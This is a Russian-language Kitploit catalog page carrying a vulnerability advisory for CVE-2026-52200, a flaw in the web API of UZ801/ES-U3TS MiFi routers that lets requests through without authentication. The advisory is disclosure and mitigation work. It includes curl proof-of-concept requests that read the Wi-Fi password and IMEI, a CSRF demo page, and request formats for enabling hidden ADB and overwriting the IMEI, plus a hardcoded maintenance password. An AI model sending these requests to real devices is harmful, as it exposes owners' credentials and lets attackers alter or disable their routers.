Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-52200 — Security advisory, описывающий нарушенный контроль доступа в веб-API MifiService устройств UZ801/ES-U3TS, позволяющий неавторизованное извлечение данных, изменение конфигурации и перезагрузку устройства. Включает PoC и меры по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/lamaper/cve-2026-52200
Безопасность IoTАнализ уязвимостейЭксплуатацияАудит конфигурацииСбор информацииВеб-безопасностьТестирование на Проникновение
GitHublamaper/cve-2026-52200

CVE-2026-52200

Security advisory, описывающий нарушенный контроль доступа в веб-API MifiService устройств UZ801/ES-U3TS, позволяющий неавторизованное извлечение данных, изменение конфигурации и перезагрузку устройства. Включает PoC и меры по смягчению последствий.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

UZ801 / ES-U3TS MifiService Нарушенный контроль доступа

Охранный бюллетень и технические заметки о проблеме нарушенного контроля доступа во встроенном веб-интерфейсе управления API, предоставляемом MifiService.apk на OEM / white-label платформе мобильного Wi-Fi UZ801_v2.1 4G LTE, также встречающейся на рынке под названием ES-U3TS.

Этот репозиторий предназначен для поддержки скоординированного раскрытия информации и присвоения CVE. Он сосредоточен на воспроизводимых, не-вейпонизированных технических доказательствах.

Краткое описание

Затронутое устройство предоставляет конечную точку управления HTTP на базе Jetty по адресу:

root@kitploit:~
http://192.168.100.1/ajax

Диспетчер запросов бэкенда реализован в:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

Хотя веб-интерфейс отображает страницу входа, бэкенд не обеспечивает действительную аутентифицированную серверную сессию для большинства функций управления. В результате злоумышленник в соседней сети может напрямую вызывать чувствительные операции funcNo без аутентификации.

Подтвержденное воздействие включает:

  • извлечение текущего пароля Wi-Fi в открытом виде
  • извлечение IMEI, информации о прошивке, статусе SIM и сетевой конфигурации
  • извлечение конфигурации DHCP и MAC-фильтра
  • изменение и сохранение конфигурации управления без аутентификации
  • запуск сброса конфигурации и перезагрузки устройства без аутентификации

Дополнительные функции высокого риска были подтверждены статическим анализом, включая:

  • перезагрузку в загрузчик
  • включение скрытых режимов USB ADB / Qualcomm Diag и перезагрузку
  • недокументированную функцию перезаписи IMEI

Область применения и наименование

Протестированное оборудование, по-видимому, относится к семейству устройств OEM / white-label. Точный первоначальный разработчик в настоящее время неизвестен, и надежный контакт службы безопасности вендора пока не установлен.

Поэтому в данном бюллетене используется следующее наименование продукта:

  • Платформа: UZ801_v2.1
  • Наблюдаемый маркетинговый псевдоним: ES-U3TS
  • Наблюдаемая прошивка: UZ801-V3.4.3
  • Наблюдаемое приложение: MifiService.apk
  • Наблюдаемый пакет: com.mifiservice.hello

Если будут обнаружены дополнительные бренды или реселлеры, поставляющие ту же прошивку, APK, веб-ресурсы и поведение funcNo, их следует рассматривать как вероятно затронутые варианты той же кодовой базы.

Затронутый компонент

  • Конечная точка веб-API /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

Основная причина

Это не в первую очередь проблема с учетными данными по умолчанию.

Основная причина — нарушенный контроль доступа в бэкенд-API:

  • для большинства запросов управления не обеспечивается аутентифицированная серверная сессия
  • отсутствует защита CSRF
  • отсутствует проверка Origin
  • отсутствует проверка Referer
  • для большинства чувствительных функций не требуется сессионный cookie или токен

Функция входа существует, но она не обеспечивает значимых границ авторизации для большей части API управления.

Модель угроз

Основной вектор атаки:

  • злоумышленник в соседней сети, подключенный к точке доступа устройства

Вторичный вектор атаки:

  • CSRF-атака на основе браузера / эксплуатация drive-by против жертвы, в данный момент подключенной к LAN устройства

По умолчанию это не удаленная атака, доступная из интернета. Злоумышленник должен либо:

  • иметь прямую связность уровня 2 / уровня 3 с 192.168.100.1, либо
  • принудить браузер подключенной жертвы отправлять запросы к конечной точке устройства

Статус доказательств

Все приведенные ниже выводы включены как затронутая функциональность той же проблемы нарушенного контроля доступа.
Где это уместно, каждый пункт явно помечен как:

  • Проверено вживую
  • Подтверждено статическим анализом

Это различие сохранено для точности. Функциональность высокого риска не помечается как протестированная вживую, если она намеренно не выполнялась на публичном оборудовании.

Технические выводы по группам функций

Неаутентифицированное раскрытие информации

Неаутентифицированное изменение конфигурации

Неаутентифицированные разрушительные / административные действия

Недокументированная или обслуживающая функциональность

funcNoОписаниеСтатусПримечания

Статус вендора

  • Первоначальный вышестоящий вендор: неизвестен
  • Тип продукта: OEM / white-label платформа мобильного роутера
  • Надежный контакт PSIRT / службы безопасности: не установлен
  • Текущее состояние раскрытия: вендор недоступен / подтвержденный канал безопасности вендора отсутствует

На момент написания устройство, по-видимому, продается через каналы OEM / реселлеров с непоследовательным или отсутствующим брендированием, и надежный контакт с первоначальным разработчиком не установлен.

Безопасные примеры PoC

Приведенные ниже примеры намеренно ограничены операциями только для чтения или низкорисковой проверкой. Они включены для демонстрации уязвимости без предоставления вейпонизированного рабочего процесса эксплуатации.

1. Чтение текущего пароля Wi-Fi без аутентификации

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

Ожидаемое поведение:

  • возвращает JSON
  • включает ssid
  • включает pwd в открытом виде

2. Чтение информации об идентификаторе устройства без аутентификации

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

Ожидаемое поведение:

  • возвращает JSON
  • включает imei
  • включает fwversion

3. Демонстрация несанкционированного постоянного доступа на запись с использованием низкорискового поля

Чтение текущего языка:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

Установка языка:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

Восстановите исходное значение после этого.

4. Концепция CSRF на основе браузера

Эта конечная точка не обеспечивает состояние сессии или проверку Origin / Referer. Поэтому браузер подключенной жертвы может быть использован для отправки фоновых запросов.

Минимальная демонстрационная страница:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

Этот пример намеренно ограничен номером функции только для чтения. Не развертывайте его против пользователей или производственных устройств.

Непубличные / высокорисковые форматы запросов

Следующие форматы JSON задокументированы только для защитного анализа и триажа. Они не сопровождаются здесь шагами выполнения.

2001 - включение скрытых отладочных интерфейсов

root@kitploit:~
{"funcNo":2001}

Наблюдаемое поведение в коде:

  • выполняет setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • выполняет sync
  • перезагружает устройство

2004 - путь перезаписи IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

Наблюдаемое поведение в коде:

  • вызывает путь, эквивалентный AT+WRIMEI=<value>
  • проверяет успех через последующий путь чтения IMEI

Никакой публичный живой тест здесь не включен из-за юридических, комплаенс-проблем и проблем целостности устройства.

Выдержки из доказательств

Пример неаутентифицированного ответа для 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Пример неаутентифицированного ответа для 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Почему это кандидат на CVE

Эта проблема является сильным кандидатом на CVE, потому что она:

  • воспроизводима на устройстве, контролируемом клиентом
  • доступна злоумышленнику в соседней сети
  • не зависит от недокументированной физической модификации
  • не является просто проблемой пароля по умолчанию
  • оказывает воздействие на конфиденциальность, целостность и доступность

Предлагаемая классификация:

  • CWE-306 Отсутствие аутентификации для критической функции
  • CWE-862 Отсутствие авторизации

Предлагаемый CVSS:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Статус раскрытия

  • Статический анализ завершен: 2026-05-11
  • Живая проверка завершена: 2026-05-12
  • Подготовка контакта с вендором завершена: 2026-05-12
  • Черновик публичного бюллетеня подготовлен: 2026-05-12

Меры по смягчению

  • требовать действительную аутентифицированную серверную сессию для всех функций управления
  • отклонять все чувствительные запросы funcNo без аутентификации
  • добавить защиту CSRF
  • проверять Origin и Referer
  • удалять недокументированные обслуживающие конечные точки из производственных сборок
  • никогда не раскрывать учетные данные Wi-Fi через неаутентифицированные ответы API

Юридическое уведомление и уведомление о безопасности

Этот репозиторий предназначен для защитных исследований, раскрытия уязвимостей и координации. Публичные примеры намеренно ограничены низкорисковой проверкой. Функциональность высокого риска задокументирована только в той степени, которая необходима для исправления и триажа CVE.

Скачать инструмент
funcNoОписаниеСтатусПримечания
1002Чтение SSID, IP устройства, DNS, пароля Wi-FiПроверено вживуюВозвращает пароль Wi-Fi в открытом виде
1009Чтение режима шифрования Wi-Fi и пароляПроверено вживуюВозвращает пароль Wi-Fi в открытом виде
1011Чтение диапазона DHCP, DNS, списка клиентовПроверено вживуюПолезно для локальной разведки
1015Чтение статуса SIMПроверено вживуюВозвращает состояние SIM
1029Чтение IMEI, прошивки, производителя, информации о сигналеПроверено вживуюВозвращает чувствительную идентичность устройства
1052Чтение режима MAC-фильтра и настроенных записейПроверено вживуюРаскрывает политику и настроенные слоты
2002Чтение активного слота SIMПроверено вживуюРаскрывает состояние выполнения
funcNoОписаниеСтатусПримечания
1004Изменение режима подключенияПодтверждено статическиНаблюдение за отсутствием принудительной сессии
1005Изменение предпочтительного режима сетиПодтверждено статическиВысокое операционное воздействие
1007Изменение SSID / максимального количества станцийПодтверждено статическиСохраняет конфигурацию и перезапускает логику AP
1010Изменение режима шифрования Wi-Fi / пароляПодтверждено статическиВысокое воздействие на конфиденциальность
1012Изменение настроек, связанных с DHCP/DNSПодтверждено статическиВмешательство в локальную сеть
1016/1017/1018Чтение / установка / переключение профиля APNПодтверждено статическиИзменение поведения WAN
1031Изменение языка и сохранениеПроверено вживуюИспользуется как низкорисковое доказательство доступа на запись
1053/1054/1055Изменение поведения и записей MAC-фильтраПодтверждено статическиВмешательство в контроль доступа к сети
funcNoОписаниеСтатусПримечания
1013Перезагрузка устройстваПроверено вживуюDoS / прерывание обслуживания
1014Сброс конфигурации приложения/сети и перезагрузкаПроверено вживуюНе полное стирание пользовательских данных Android
2000Перезагрузка в загрузчикПроверено вживуюВысокое операционное воздействие
2001Включение скрытой конфигурации USB ADB/Diag и перезагрузкаПодтверждено статическиОпасный путь обслуживания
2003Скрытый путь обслуживающего пароляПодтверждено статическиИспользует жестко заданный admin8888; поведение выглядит частичным / остаточным
2004Перезапись IMEIПодтверждено статическиВызывает путь AT-команд; публично не выполнялось